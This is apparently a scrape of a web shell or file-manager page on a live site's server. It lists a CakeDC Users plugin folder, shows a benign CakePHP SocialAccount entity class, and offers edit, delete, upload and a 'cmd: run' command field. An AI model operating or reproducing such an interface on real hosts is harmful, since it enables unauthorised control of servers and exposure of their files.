/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
vendor
/
cakedc
/
users
/
src
/
Model
/
Entity
/
/var/www/vhosts/ihelp.ro/httpdocs/vendor/cakedc/users/src/Model/Entity
mkdir
upload
Name
Size
Mode
Actions
SocialAccount.php
939
0644
edit
dl
rm
User.php
4535
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/vendor/cakedc/users/src/Model/Entity/SocialAccount.php
(939B)
<?php declare(strict_types=1); /** * Copyright 2010 - 2019, Cake Development Corporation (https://www.cakedc.com) * * Licensed under The MIT License * Redistributions of files must retain the above copyright notice. * * @copyright Copyright 2010 - 2018, Cake Development Corporation (https://www.cakedc.com) * @license MIT License (http://www.opensource.org/licenses/mit-license.php) */ namespace CakeDC\Users\Model\Entity; use Cake\ORM\Entity; /** * Account Entity. */ class SocialAccount extends Entity { /** * Fields that can be mass assigned using newEntity() or patchEntity(). * * @var array */ protected $_accessible = [ '*' => true, 'id' => false, ]; /** * Fields that are excluded from JSON an array versions of the entity. * * @var array */ protected $_hidden = [ 'token', 'token_secret', 'token_expires', ]; }
Save
cmd:
run